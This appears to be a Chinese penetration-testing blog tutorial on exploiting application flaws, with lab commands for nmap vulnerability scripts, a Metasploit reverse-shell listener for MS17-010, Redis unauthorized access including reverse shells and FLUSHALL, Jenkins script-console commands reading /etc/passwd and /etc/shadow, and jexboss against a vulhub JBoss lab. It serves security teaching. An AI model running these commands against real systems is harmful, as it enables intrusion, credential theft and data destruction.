渗透攻击之应用系统漏洞利用

应用系统漏洞利用

常见漏洞扫描

nmap扫描技巧
auth处理身份验证
broadcast网络广播
brute暴力破解
default默认
discovery服务发现
dos拒绝服务
exploit漏洞利用
external外部扩展
fuzzer模糊测试
intrusive扫描可能造成不良后果
malware检测后门
safe扫描危害较小
version版本识别
vuln漏洞检测
通用参数 -vuln
nmap --script=vuln 192.168.117.130
MS17-010
nmap --script=smb-vuln-ms17-010 192.168.117.130

impacket框架之mssql服务器安全检测

mssqlclient与其他工具相比的优势
1.跨平台,Python脚本编写,并且已有exe版本。
2.命令行执行,速度快。
3.支持使用socks代理传输数据。
4.支持以hash传递的方式进行账号验证。
5.支持Windows认证模式进行mssql服务的安全检测。
6.执行SQL命令可以是交互式,也可以直接回显SQL命令执行结果。
mssqlclient的基本使用命令
验证以Windows认证模式的mssql服务
python mssqlclient.py domain/username:password@ip -windows-auth
验证以mssql账号密码认证的mssql服务
python mssqlclien.py ./username:password@ip
验证以mssql账号密码认证的mssql服务,并执行command.txt内的SQL命令
python mssqlclient.py ./username:password@ip -file command.txt

MS17_010 py脚本利用

利用
在本机虚拟机搭建kali和Windows7系统,由于Windows7为64位系统,所以kali中用metasploit生成64位的dll
在这里插入图片描述
msfconsole 进入控制台
在这里插入图片描述

use exploit/multi/handler 使用监听模式
在这里插入图片描述
set payload windows/x64/meterpreter/reverse_tcp 设置
payload
在这里插入图片描述
show options 查看配置信息
在这里插入图片描述
set LHOST 192.168.1.105 设置本地IP
在这里插入图片描述
set LPORT 12399 设置本地端口
在这里插入图片描述
run 运行
在这里插入图片描述

未授权漏洞

Redis

定义:redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库。
代码:redis-cli
在这里插入图片描述

写入文件
在这里插入图片描述

反弹shell-Linux
在这里插入图片描述
写入公钥
生成公钥:ssh-keygen -t rsa
在这里插入图片描述
清空数据库
172.16.143.1:6379> FLUSHALL

jenkins

定义:默认是8080端口,未授权访问就是任意用户都能访问,都可以执行命令;
127.0.0.1:8080/jenkins/manage
127.0.0.1:8080/jenkins/script
linux:
println “ifconfig -a”.execute().text
println “cat etc/passwd”.execute().text
println “cat etc/shadow”.execute().text

Mongodb

利用可视化工具连接 默认端口:28017
脚本检测:
在这里插入图片描述

Zookeeper

默认端口:2181 2171
ls / 查看所有节点
get / 获取某个节点信息
脚本检测:
在这里插入图片描述

Elasticsearch

默认端口:9200
在这里插入图片描述

Memcache

默认端口11211
提示连接成功表示漏洞存在。telnet11211,或nc -vv11211

JBOSS未授权访问

jboss
jbboss是基于J2EE开放源代码的应用服务。JBOSS代码遵循LGPL许可,可以在任何商业应用中。
jboss未授权访问
未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令
漏洞复现(使用CVE-2017-7504的漏洞环境)
使用vulhub漏洞平台,启用环境位置:
vulhub–jboss–cve-2017-7504
docker-compose up -d
启用成功使用浏览器访问:IP:8080,无账号密码
进入后台找到入口
使用kali进行漏洞利用
git clone https://github.com/joaomatosf/jexboss cd jexboss
python3 jexboss.py -u ip+port
执行工具会依次检测项目,有漏洞就会显示红色的:VULNERALE(易攻击的),工具就会根据找到容易受到攻击的点,进行利用。
获取shell后执行shell命令:cat /etc/passwd

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值